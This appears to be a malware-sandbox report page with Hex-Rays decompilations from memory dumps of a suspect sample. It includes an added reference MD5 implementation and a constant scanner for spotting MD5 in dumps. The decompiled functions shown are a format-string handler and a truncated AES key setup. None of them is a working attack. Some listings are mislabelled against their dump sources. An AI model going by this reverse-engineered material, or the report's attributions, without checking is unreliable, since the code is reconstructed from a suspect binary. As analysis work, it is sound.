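E00C61150 is an MD5 block (compression) function: the additive constants (0xd76aa478, 0x242070db, 0xc1bdceee and so on, with values above 0x7fffffff printed by the decompiler as negative offsets, e.g. -0x173848aa for 0xe8c7b756 and -0x14792c6f for 0xeb86d391), the rotation amounts (7/12/17/22, 5/9/14/20, 4/11/16/23, 6/10/15/21, where "ror edi, 0xf" is rol 17), the four round functions and the little-endian load of 16 message words all match RFC 1321. The chaining state A, B, C, D lives at ecx+0x50..0x5c and edx points at the 64-byte block; the _v8 cookie load at entry and the final E00C51252 call are the MSVC /GS stack check, not part of the hash. The following C is an added example, not code from the sample or from the Joe Sandbox report: a reference MD5 laid out to line up with that decompilation, plus a scanner that finds the same constants in a raw dump such as the .sdmp files listed on this page. The scanner's input buffer is constructed here for illustration.

```c
/* Added example, not code from the sample or the Joe Sandbox report: a reference MD5
 * laid out to match the decompiled E00C61150, plus a constant scanner for raw dumps. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* T[i] = floor(|sin(i + 1)| * 2^32). The decompiler prints values with the top bit set
 * either directly (0xd76aa478) or as a negative offset (-0x173848aa == 0xe8c7b756),
 * which is why the listing mixes "+ 0x..." and "- 0x..." forms of the same table. */
static const uint32_t MD5_T[64] = {
    0xd76aa478, 0xe8c7b756, 0x242070db, 0xc1bdceee, 0xf57c0faf, 0x4787c62a, 0xa8304613, 0xfd469501,
    0x698098d8, 0x8b44f7af, 0xffff5bb1, 0x895cd7be, 0x6b901122, 0xfd987193, 0xa679438e, 0x49b40821,
    0xf61e2562, 0xc040b340, 0x265e5a51, 0xe9b6c7aa, 0xd62f105d, 0x02441453, 0xd8a1e681, 0xe7d3fbc8,
    0x21e1cde6, 0xc33707d6, 0xf4d50d87, 0x455a14ed, 0xa9e3e905, 0xfcefa3f8, 0x676f02d9, 0x8d2a4c8a,
    0xfffa3942, 0x8771f681, 0x6d9d6122, 0xfde5380c, 0xa4beea44, 0x4bdecfa9, 0xf6bb4b60, 0xbebfbc70,
    0x289b7ec6, 0xeaa127fa, 0xd4ef3085, 0x04881d05, 0xd9d4d039, 0xe6db99e5, 0x1fa27cf8, 0xc4ac5665,
    0xf4292244, 0x432aff97, 0xab9423a7, 0xfc93a039, 0x655b59c3, 0x8f0ccc92, 0xffeff47d, 0x85845dd1,
    0x6fa87e4f, 0xfe2ce6e0, 0xa3014314, 0x4e0811a1, 0xf7537e82, 0xbd3af235, 0x2ad7d2bb, 0xeb86d391 };

/* Per-step rotations: "rol edx, 0x7", "rol esi, 0xc", "ror edi, 0xf" (= rol 17) and
 * "ror ebx, 0xa" (= rol 22) in round 1, and likewise for the other three rounds. */
static const uint8_t MD5_S[64] = {
    7,12,17,22, 7,12,17,22, 7,12,17,22, 7,12,17,22,   5, 9,14,20, 5, 9,14,20, 5, 9,14,20, 5, 9,14,20,
    4,11,16,23, 4,11,16,23, 4,11,16,23, 4,11,16,23,   6,10,15,21, 6,10,15,21, 6,10,15,21, 6,10,15,21 };

static uint32_t rol32(uint32_t x, unsigned n) { return (x << n) | (x >> (32 - n)); }

/* One 64-byte block. state[0..3] = A, B, C, D; the sample keeps them at ctx+0x50..0x5c
 * (ecx = ctx, edx = block). The byte loop mirrors the listing's little-endian word load. */
void md5_compress(uint32_t state[4], const uint8_t block[64]) {
    uint32_t X[16];
    for (int i = 0; i < 16; i++)
        X[i] = (uint32_t)block[4*i] | ((uint32_t)block[4*i+1] << 8) |
               ((uint32_t)block[4*i+2] << 16) | ((uint32_t)block[4*i+3] << 24);
    uint32_t a = state[0], b = state[1], c = state[2], d = state[3];
    for (int i = 0; i < 64; i++) {
        uint32_t f; unsigned g;
        if (i < 16)      { f = (b & c) | (~b & d); g = i; }              /* F: (!B & D) | (C & B) */
        else if (i < 32) { f = (b & d) | (c & ~d); g = (5*i + 1) & 15; } /* G */
        else if (i < 48) { f = b ^ c ^ d;          g = (3*i + 5) & 15; } /* H */
        else             { f = c ^ (b | ~d);       g = (7*i) & 15; }     /* I: (!D | B) ^ C */
        uint32_t tmp = d; d = c; c = b;
        b = b + rol32(a + f + MD5_T[i] + X[g], MD5_S[i]);
        a = tmp;
    }
    state[0] += a; state[1] += b; state[2] += c; state[3] += d;
}

/* Full MD5: padding is 0x80, zeros, then the 64-bit little-endian bit length. */
void md5(const uint8_t *msg, size_t len, uint8_t digest[16]) {
    uint32_t st[4] = { 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476 };
    size_t off = 0;
    for (; len - off >= 64; off += 64) md5_compress(st, msg + off);
    uint8_t tail[128] = {0};
    size_t rem = len - off;                 /* 0..63 bytes left over */
    memcpy(tail, msg + off, rem);
    tail[rem] = 0x80;
    size_t padded = (rem < 56) ? 64 : 128;  /* the length field needs 8 free bytes */
    uint64_t bits = (uint64_t)len * 8;
    for (int i = 0; i < 8; i++) tail[padded - 8 + i] = (uint8_t)(bits >> (8 * i));
    md5_compress(st, tail);
    if (padded == 128) md5_compress(st, tail + 64);
    for (int i = 0; i < 4; i++)
        for (int j = 0; j < 4; j++) digest[4*i + j] = (uint8_t)(st[i] >> (8 * j));
}

/* Hex digest into a caller-supplied 33-byte buffer; returns that buffer. */
const char *md5_hex(const uint8_t *msg, size_t len, char hex[33]) {
    uint8_t d[16];
    md5(msg, len, d);
    for (int i = 0; i < 16; i++) sprintf(hex + 2*i, "%02x", d[i]);
    return hex;
}

/* Scan a raw dump (such as the .sdmp files named on this page) for little-endian MD5
 * constants. Returns the number of distinct T[i] seen; *first_off gets the first hit.
 * A handful of hits in one region is enough to flag MD5 before opening a decompiler. */
int find_md5_constants(const uint8_t *buf, size_t len, size_t *first_off) {
    int found = 0, seen[64] = {0};
    for (size_t off = 0; off + 4 <= len; off++) {
        uint32_t w = (uint32_t)buf[off] | ((uint32_t)buf[off+1] << 8) |
                     ((uint32_t)buf[off+2] << 16) | ((uint32_t)buf[off+3] << 24);
        for (int i = 0; i < 64; i++) {
            if (w != MD5_T[i] || seen[i]) continue;
            if (found == 0 && first_off) *first_off = off;
            seen[i] = 1; found++;
        }
    }
    return found;
}

/* Constructed stand-in for a dump: lea eax,[esi+0xd76aa478]; nop; add esi,0xe8c7b756. */
static const uint8_t SAMPLE_CODE[] = {
    0x8d, 0x86, 0x78, 0xa4, 0x6a, 0xd7, 0x90, 0x81, 0xc6, 0x56, 0xb7, 0xc7, 0xe8 };

int main(void) {
    char hex[33]; size_t off = 0;
    printf("md5(\"abc\") = %s\n", md5_hex((const uint8_t *)"abc", 3, hex));
    printf("MD5 constants in sample: %d (first at offset %zu)\n",
           find_md5_constants(SAMPLE_CODE, sizeof SAMPLE_CODE, &off), off);
    return 0;
}
```

Checking md5_hex against the RFC 1321 vectors is the quickest way to confirm the identification; if a dumped function's constants differ from MD5_T in even one entry, treat it as a customised or deliberately altered hash rather than stock MD5, which the scanner above would show as a low hit count.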

    Per-statement address column for E00C61150 above (one entry per C-code line, 0x00c61156 through 0x00c61842).

    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd
    C-Code - Quality: 83%
    			E100039B3(void* __ebx, void* __ecx, void* __edi, void* __esi) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _t52;
    				signed int _t54;
    				signed int _t55;
    				void* _t56;
    				signed char _t60;
    				signed char _t62;
    				signed int _t64;
    				void* _t65;
    				signed int _t66;
    				signed char _t75;
    				signed char _t78;
    				void* _t86;
    				void* _t88;
    				signed char _t90;
    				signed char _t92;
    				signed int _t93;
    				signed int _t96;
    				signed int _t98;
    				signed int _t99;
    				signed int _t103;
    				signed int* _t104;
    				void* _t106;
    				signed int _t112;
    				unsigned int _t114;
    				signed char _t116;
    				void* _t124;
    				unsigned int _t125;
    				void* _t126;
    				signed int _t127;
    				short _t128;
    				void* _t131;
    				void* _t133;
    				void* _t135;
    				signed int _t136;
    				void* _t137;
    				void* _t139;
    				void* _t140;
    
    				_t126 = __edi;
    				_t52 =  *0x1001d018; // 0x26c1db24
    				_v8 = _t52 ^ _t136;
    				_t135 = __ecx;
    				_t103 = 0;
    				_t124 = 0x41;
    				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
    				_t106 = 0x58;
    				_t139 = _t54 - 0x64;
    				if(_t139 > 0) {
    					__eflags = _t54 - 0x70;
    					if(__eflags > 0) {
    						_t55 = _t54 - 0x73;
    						__eflags = _t55;
    						if(_t55 == 0) {
    							L9:
    							_t56 = E10004357(_t135);
    							L10:
    							if(_t56 != 0) {
    								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
    								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
    									L71:
    									L72:
    									return E10001B26(_v8 ^ _t136);
    								}
    								_t125 =  *(_t135 + 0x20);
    								_push(_t126);
    								_v16 = _t103;
    								_t60 = _t125 >> 4;
    								_v12 = _t103;
    								_t127 = 0x20;
    								__eflags = 1 & _t60;
    								if((1 & _t60) == 0) {
    									L46:
    									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
    									__eflags = _t112 - 0x78;
    									if(_t112 == 0x78) {
    										L48:
    										_t62 = _t125 >> 5;
    										__eflags = _t62 & 0x00000001;
    										if((_t62 & 0x00000001) == 0) {
    											L50:
    											__eflags = 0;
    											L51:
    											__eflags = _t112 - 0x61;
    											if(_t112 == 0x61) {
    												L54:
    												_t64 = 1;
    												L55:
    												_t128 = 0x30;
    												__eflags = _t64;
    												if(_t64 != 0) {
    													L57:
    													_t65 = 0x58;
    													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
    													__eflags = _t112 - _t65;
    													if(_t112 == _t65) {
    														L60:
    														_t66 = 1;
    														L61:
    														__eflags = _t66;
    														asm("cbw");
    														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
    														_t103 = _t103 + 2;
    														__eflags = _t103;
    														L62:
    														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
    														__eflags = _t125 & 0x0000000c;
    														if((_t125 & 0x0000000c) == 0) {
    															E10002E58(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
    															_t137 = _t137 + 0x10;
    														}
    														E100045E3(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
    														_t114 =  *(_t135 + 0x20);
    														_t104 = _t135 + 0x18;
    														_t75 = _t114 >> 3;
    														__eflags = _t75 & 0x00000001;
    														if((_t75 & 0x00000001) != 0) {
    															_t116 = _t114 >> 2;
    															__eflags = _t116 & 0x00000001;
    															if((_t116 & 0x00000001) == 0) {
    																E10002E58(_t135 + 0x448, 0x30, _t131, _t104);
    																_t137 = _t137 + 0x10;
    															}
    														}
    														E100044CD(_t135, _t125, 0);
    														__eflags =  *_t104;
    														if( *_t104 >= 0) {
    															_t78 =  *(_t135 + 0x20) >> 2;
    															__eflags = _t78 & 0x00000001;
    															if((_t78 & 0x00000001) != 0) {
    																E10002E58(_t135 + 0x448, 0x20, _t131, _t104);
    															}
    														}
    														goto L71;
    													}
    													_t86 = 0x41;
    													__eflags = _t112 - _t86;
    													if(_t112 == _t86) {
    														goto L60;
    													}
    													_t66 = 0;
    													goto L61;
    												}
    												__eflags = _t64;
    												if(_t64 == 0) {
    													goto L62;
    												}
    												goto L57;
    											}
    											_t133 = 0x41;
    											__eflags = _t112 - _t133;
    											if(_t112 == _t133) {
    												goto L54;
    											}
    											_t64 = 0;
    											goto L55;
    										}
    										goto L51;
    									}
    									_t88 = 0x58;
    									__eflags = _t112 - _t88;
    									if(_t112 != _t88) {
    										goto L50;
    									}
    									goto L48;
    								}
    								_t90 = _t125 >> 6;
    								__eflags = 1 & _t90;
    								if((1 & _t90) == 0) {
    									__eflags = 1 & _t125;
    									if((1 & _t125) == 0) {
    										_t92 = _t125 >> 1;
    										__eflags = 1 & _t92;
    										if((1 & _t92) == 0) {
    											goto L46;
    										}
    										_v16 = _t127;
    										L45:
    										_t103 = 1;
    										goto L46;
    									}
    									_push(0x2b);
    									L40:
    									_pop(_t93);
    									_v16 = _t93;
    									goto L45;
    								}
    								_push(0x2d);
    								goto L40;
    							}
    							L11:
    							goto L72;
    						}
    						_t96 = _t55;
    						__eflags = _t96;
    						if(__eflags == 0) {
    							L28:
    							_push(_t103);
    							_push(0xa);
    							L29:
    							_t56 = E10004162(_t135, _t126, __eflags);
    							goto L10;
    						}
    						__eflags = _t96 - 3;
    						if(__eflags != 0) {
    							goto L11;
    						}
    						_push(0);
    						L13:
    						_push(0x10);
    						goto L29;
    					}
    					if(__eflags == 0) {
    						_t56 = E1000433F(__ecx);
    						goto L10;
    					}
    					__eflags = _t54 - 0x67;
    					if(_t54 <= 0x67) {
    						L30:
    						_t56 = E10003F58(_t103, _t135);
    						goto L10;
    					}
    					__eflags = _t54 - 0x69;
    					if(_t54 == 0x69) {
    						L27:
    						_t3 = _t135 + 0x20;
    						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
    						__eflags =  *_t3;
    						goto L28;
    					}
    					__eflags = _t54 - 0x6e;
    					if(_t54 == 0x6e) {
    						_t56 = E100042AC(__ecx, _t124);
    						goto L10;
    					}
    					__eflags = _t54 - 0x6f;
    					if(_t54 != 0x6f) {
    						goto L11;
    					}
    					_t56 = E10004320(__ecx);
    					goto L10;
    				}
    				if(_t139 == 0) {
    					goto L27;
    				}
    				_t140 = _t54 - _t106;
    				if(_t140 > 0) {
    					_t98 = _t54 - 0x5a;
    					__eflags = _t98;
    					if(_t98 == 0) {
    						_t56 = E10003EF5(__ecx);
    						goto L10;
    					}
    					_t99 = _t98 - 7;
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L30;
    					}
    					__eflags = _t99;
    					if(__eflags != 0) {
    						goto L11;
    					}
    					L17:
    					_t56 = E100040CA(_t135, __eflags, _t103);
    					goto L10;
    				}
    				if(_t140 == 0) {
    					_push(1);
    					goto L13;
    				}
    				if(_t54 == _t124) {
    					goto L30;
    				}
    				if(_t54 == 0x43) {
    					goto L17;
    				}
    				if(_t54 <= 0x44) {
    					goto L11;
    				}
    				if(_t54 <= 0x47) {
    					goto L30;
    				}
    				if(_t54 != 0x53) {
    					goto L11;
    				}
    				goto L9;
    			}

    Per-statement address column for E100039B3 above (one entry per C-code line, 0x100039b3 through 0x10003c0f; 0x00000000 where a line has no instruction address).

    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 83%
    			E10003C10(void* __ebx, void* __ecx, void* __edi, void* __esi) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				signed int _t52;
    				signed int _t54;
    				signed int _t55;
    				void* _t56;
    				signed char _t60;
    				signed char _t62;
    				signed int _t64;
    				void* _t65;
    				signed int _t66;
    				signed char _t75;
    				signed char _t78;
    				void* _t86;
    				void* _t88;
    				signed char _t90;
    				signed char _t92;
    				signed int _t93;
    				signed int _t96;
    				signed int _t98;
    				signed int _t99;
    				signed int _t103;
    				signed int* _t104;
    				void* _t106;
    				signed int _t112;
    				unsigned int _t114;
    				signed char _t116;
    				void* _t124;
    				unsigned int _t125;
    				void* _t126;
    				signed int _t127;
    				short _t128;
    				void* _t131;
    				void* _t133;
    				void* _t135;
    				signed int _t136;
    				void* _t137;
    				void* _t139;
    				void* _t140;
    
    				_t126 = __edi;
    				_t52 =  *0x1001d018; // 0x26c1db24
    				_v8 = _t52 ^ _t136;
    				_t135 = __ecx;
    				_t103 = 0;
    				_t124 = 0x41;
    				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
    				_t106 = 0x58;
    				_t139 = _t54 - 0x64;
    				if(_t139 > 0) {
    					__eflags = _t54 - 0x70;
    					if(__eflags > 0) {
    						_t55 = _t54 - 0x73;
    						__eflags = _t55;
    						if(_t55 == 0) {
    							L9:
    							_t56 = E10004357(_t135);
    							L10:
    							if(_t56 != 0) {
    								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
    								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
    									L71:
    									L72:
    									return E10001B26(_v8 ^ _t136);
    								}
    								_t125 =  *(_t135 + 0x20);
    								_push(_t126);
    								_v16 = _t103;
    								_t60 = _t125 >> 4;
    								_v12 = _t103;
    								_t127 = 0x20;
    								__eflags = 1 & _t60;
    								if((1 & _t60) == 0) {
    									L46:
    									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
    									__eflags = _t112 - 0x78;
    									if(_t112 == 0x78) {
    										L48:
    										_t62 = _t125 >> 5;
    										__eflags = _t62 & 0x00000001;
    										if((_t62 & 0x00000001) == 0) {
    											L50:
    											__eflags = 0;
    											L51:
    											__eflags = _t112 - 0x61;
    											if(_t112 == 0x61) {
    												L54:
    												_t64 = 1;
    												L55:
    												_t128 = 0x30;
    												__eflags = _t64;
    												if(_t64 != 0) {
    													L57:
    													_t65 = 0x58;
    													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
    													__eflags = _t112 - _t65;
    													if(_t112 == _t65) {
    														L60:
    														_t66 = 1;
    														L61:
    														__eflags = _t66;
    														asm("cbw");
    														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
    														_t103 = _t103 + 2;
    														__eflags = _t103;
    														L62:
    														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
    														__eflags = _t125 & 0x0000000c;
    														if((_t125 & 0x0000000c) == 0) {
    															E10002E89(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
    															_t137 = _t137 + 0x10;
    														}
    														E10004670(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
    														_t114 =  *(_t135 + 0x20);
    														_t104 = _t135 + 0x18;
    														_t75 = _t114 >> 3;
    														__eflags = _t75 & 0x00000001;
    														if((_t75 & 0x00000001) != 0) {
    															_t116 = _t114 >> 2;
    															__eflags = _t116 & 0x00000001;
    															if((_t116 & 0x00000001) == 0) {
    																E10002E89(_t135 + 0x448, 0x30, _t131, _t104);
    																_t137 = _t137 + 0x10;
    															}
    														}
    														E10004558(_t135, 0);
    														__eflags =  *_t104;
    														if( *_t104 >= 0) {
    															_t78 =  *(_t135 + 0x20) >> 2;
    															__eflags = _t78 & 0x00000001;
    															if((_t78 & 0x00000001) != 0) {
    																E10002E89(_t135 + 0x448, 0x20, _t131, _t104);
    															}
    														}
    														goto L71;
    													}
    													_t86 = 0x41;
    													__eflags = _t112 - _t86;
    													if(_t112 == _t86) {
    														goto L60;
    													}
    													_t66 = 0;
    													goto L61;
    												}
    												__eflags = _t64;
    												if(_t64 == 0) {
    													goto L62;
    												}
    												goto L57;
    											}
    											_t133 = 0x41;
    											__eflags = _t112 - _t133;
    											if(_t112 == _t133) {
    												goto L54;
    											}
    											_t64 = 0;
    											goto L55;
    										}
    										goto L51;
    									}
    									_t88 = 0x58;
    									__eflags = _t112 - _t88;
    									if(_t112 != _t88) {
    										goto L50;
    									}
    									goto L48;
    								}
    								_t90 = _t125 >> 6;
    								__eflags = 1 & _t90;
    								if((1 & _t90) == 0) {
    									__eflags = 1 & _t125;
    									if((1 & _t125) == 0) {
    										_t92 = _t125 >> 1;
    										__eflags = 1 & _t92;
    										if((1 & _t92) == 0) {
    											goto L46;
    										}
    										_v16 = _t127;
    										L45:
    										_t103 = 1;
    										goto L46;
    									}
    									_push(0x2b);
    									L40:
    									_pop(_t93);
    									_v16 = _t93;
    									goto L45;
    								}
    								_push(0x2d);
    								goto L40;
    							}
    							L11:
    							goto L72;
    						}
    						_t96 = _t55;
    						__eflags = _t96;
    						if(__eflags == 0) {
    							L28:
    							_push(_t103);
    							_push(0xa);
    							L29:
    							_t56 = E10004162(_t135, _t126, __eflags);
    							goto L10;
    						}
    						__eflags = _t96 - 3;
    						if(__eflags != 0) {
    							goto L11;
    						}
    						_push(0);
    						L13:
    						_push(0x10);
    						goto L29;
    					}
    					if(__eflags == 0) {
    						_t56 = E1000433F(__ecx);
    						goto L10;
    					}
    					__eflags = _t54 - 0x67;
    					if(_t54 <= 0x67) {
    						L30:
    						_t56 = E10003F58(_t103, _t135);
    						goto L10;
    					}
    					__eflags = _t54 - 0x69;
    					if(_t54 == 0x69) {
    						L27:
    						_t3 = _t135 + 0x20;
    						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
    						__eflags =  *_t3;
    						goto L28;
    					}
    					__eflags = _t54 - 0x6e;
    					if(_t54 == 0x6e) {
    						_t56 = E100042AC(__ecx, _t124);
    						goto L10;
    					}
    					__eflags = _t54 - 0x6f;
    					if(_t54 != 0x6f) {
    						goto L11;
    					}
    					_t56 = E10004320(__ecx);
    					goto L10;
    				}
    				if(_t139 == 0) {
    					goto L27;
    				}
    				_t140 = _t54 - _t106;
    				if(_t140 > 0) {
    					_t98 = _t54 - 0x5a;
    					__eflags = _t98;
    					if(_t98 == 0) {
    						_t56 = E10003EF5(__ecx);
    						goto L10;
    					}
    					_t99 = _t98 - 7;
    					__eflags = _t99;
    					if(_t99 == 0) {
    						goto L30;
    					}
    					__eflags = _t99;
    					if(__eflags != 0) {
    						goto L11;
    					}
    					L17:
    					_t56 = E100040CA(_t135, __eflags, _t103);
    					goto L10;
    				}
    				if(_t140 == 0) {
    					_push(1);
    					goto L13;
    				}
    				if(_t54 == _t124) {
    					goto L30;
    				}
    				if(_t54 == 0x43) {
    					goto L17;
    				}
    				if(_t54 <= 0x44) {
    					goto L11;
    				}
    				if(_t54 <= 0x47) {
    					goto L30;
    				}
    				if(_t54 != 0x53) {
    					goto L11;
    				}
    				goto L9;
    			}
    0x10003c10
    0x10003c18
    0x10003c1f
    0x10003c24
    0x10003c26
    0x10003c2a
    0x10003c2d
    0x10003c31
    0x10003c32
    0x10003c35
    0x10003ca2
    0x10003ca5
    0x10003cf4
    0x10003cf4
    0x10003cf7
    0x10003c63
    0x10003c65
    0x10003c6a
    0x10003c6c
    0x10003d12
    0x10003d15
    0x10003e5b
    0x10003e5d
    0x10003e6c
    0x10003e6c
    0x10003d1b
    0x10003d20
    0x10003d23
    0x10003d26
    0x10003d2a
    0x10003d30
    0x10003d31
    0x10003d33
    0x10003d5d
    0x10003d5d
    0x10003d61
    0x10003d64
    0x10003d6e
    0x10003d70
    0x10003d73
    0x10003d75
    0x10003d7b
    0x10003d7b
    0x10003d7d
    0x10003d7d
    0x10003d80
    0x10003d8e
    0x10003d8e
    0x10003d90
    0x10003d92
    0x10003d93
    0x10003d95
    0x10003d9b
    0x10003d9d
    0x10003d9e
    0x10003da3
    0x10003da6
    0x10003db4
    0x10003db4
    0x10003db6
    0x10003db6
    0x10003dc1
    0x10003dc3
    0x10003dc8
    0x10003dc8
    0x10003dcb
    0x10003dd1
    0x10003dd3
    0x10003dd6
    0x10003de6
    0x10003deb
    0x10003deb
    0x10003e00
    0x10003e05
    0x10003e08
    0x10003e0d
    0x10003e10
    0x10003e12
    0x10003e14
    0x10003e17
    0x10003e1a
    0x10003e27
    0x10003e2c
    0x10003e2c
    0x10003e1a
    0x10003e33
    0x10003e38
    0x10003e3b
    0x10003e40
    0x10003e43
    0x10003e45
    0x10003e52
    0x10003e57
    0x10003e45
    0x00000000
    0x10003e5a
    0x10003daa
    0x10003dab
    0x10003dae
    0x00000000
    0x00000000
    0x10003db0
    0x00000000
    0x10003db0
    0x10003d97
    0x10003d99
    0x00000000
    0x00000000
    0x00000000
    0x10003d99
    0x10003d84
    0x10003d85
    0x10003d88
    0x00000000
    0x00000000
    0x10003d8a
    0x00000000
    0x10003d8a
    0x00000000
    0x10003d77
    0x10003d68
    0x10003d69
    0x10003d6c
    0x00000000
    0x00000000
    0x00000000
    0x10003d6c
    0x10003d37
    0x10003d3a
    0x10003d3c
    0x10003d47
    0x10003d49
    0x10003d51
    0x10003d53
    0x10003d55
    0x00000000
    0x00000000
    0x10003d57
    0x10003d5b
    0x10003d5b
    0x00000000
    0x10003d5b
    0x10003d4b
    0x10003d40
    0x10003d40
    0x10003d41
    0x00000000
    0x10003d41
    0x10003d3e
    0x00000000
    0x10003d3e
    0x10003c72
    0x00000000
    0x10003c72
    0x10003cfe
    0x10003cfe
    0x10003d01
    0x10003cd3
    0x10003cd3
    0x10003cd4
    0x10003cd6
    0x10003cd8
    0x00000000
    0x10003cd8
    0x10003d03
    0x10003d06
    0x00000000
    0x00000000
    0x10003d0c
    0x10003c7b
    0x10003c7b
    0x00000000
    0x10003c7b
    0x10003ca7
    0x10003cea
    0x00000000
    0x10003cea
    0x10003ca9
    0x10003cac
    0x10003cdf
    0x10003ce1
    0x00000000
    0x10003ce1
    0x10003cae
    0x10003cb1
    0x10003ccf
    0x10003ccf
    0x10003ccf
    0x10003ccf
    0x00000000
    0x10003ccf
    0x10003cb3
    0x10003cb6
    0x10003cc8
    0x00000000
    0x10003cc8
    0x10003cb8
    0x10003cbb
    0x00000000
    0x00000000
    0x10003cbf
    0x00000000
    0x10003cbf
    0x10003c37
    0x00000000
    0x00000000
    0x10003c3d
    0x10003c3f
    0x10003c7f
    0x10003c7f
    0x10003c82
    0x10003c9b
    0x00000000
    0x10003c9b
    0x10003c84
    0x10003c84
    0x10003c87
    0x00000000
    0x00000000
    0x10003c8a
    0x10003c8d
    0x00000000
    0x00000000
    0x10003c8f
    0x10003c92
    0x00000000
    0x10003c92
    0x10003c41
    0x10003c79
    0x00000000
    0x10003c79
    0x10003c45
    0x00000000
    0x00000000
    0x10003c4e
    0x00000000
    0x00000000
    0x10003c53
    0x00000000
    0x00000000
    0x10003c58
    0x00000000
    0x00000000
    0x10003c61
    0x00000000
    0x00000000
    0x00000000

    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 72%
    			E00C5FD20(signed char* __ecx, signed int* __edx) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t86;
    				signed int _t112;
    				signed int _t124;
    				signed int _t125;
    				signed int _t184;
    				signed int _t191;
    				signed int _t194;
    				signed int _t198;
    				signed int _t220;
    				signed int _t235;
    				signed int _t239;
    				signed int _t243;
    				signed int* _t244;
    				unsigned int _t246;
    				signed int _t252;
    				signed int _t255;
    
    				_t86 =  *0xc6a004; // 0x26d30358
    				_v8 = _t86 ^ _t252;
    				_t245 = __ecx;
    				_v68 = 0x1000000;
    				_t244 = __edx;
    				_v64 = 0x2000000;
    				_v60 = 0x4000000;
    				_v56 = 0x8000000;
    				_v52 = 0x10000000;
    				_v48 = 0x20000000;
    				 *__edx = ((( *__ecx & 0x000000ff) << 0x00000008 | __ecx[1] & 0x000000ff) << 0x00000008 | __ecx[2] & 0x000000ff) << 0x00000008 | __ecx[3] & 0x000000ff;
    				_v44 = 0x40000000;
    				_v40 = 0x80000000;
    				_v36 = 0x1b000000;
    				__edx[1] = (((__ecx[4] & 0x000000ff) << 0x00000008 | __ecx[5] & 0x000000ff) << 0x00000008 | __ecx[6] & 0x000000ff) << 0x00000008 | __ecx[7] & 0x000000ff;
    				_v32 = 0x36000000;
    				_v28 = 0x6c000000;
    				_v24 = 0xd8000000;
    				__edx[2] = (((__ecx[8] & 0x000000ff) << 0x00000008 | __ecx[9] & 0x000000ff) << 0x00000008 | __ecx[0xa] & 0x000000ff) << 0x00000008 | __ecx[0xb] & 0x000000ff;
    				_v20 = 0xab000000;
    				_v16 = 0x4d000000;
    				_v12 = 0x9a000000;
    				__edx[3] = (((__ecx[0xc] & 0x000000ff) << 0x00000008 | __ecx[0xd] & 0x000000ff) << 0x00000008 | __ecx[0xe] & 0x000000ff) << 0x00000008 | __ecx[0xf] & 0x000000ff;
    				__edx[4] = (((__ecx[0x10] & 0x000000ff) << 0x00000008 | __ecx[0x11] & 0x000000ff) << 0x00000008 | __ecx[0x12] & 0x000000ff) << 0x00000008 | __ecx[0x13] & 0x000000ff;
    				_t125 = 8;
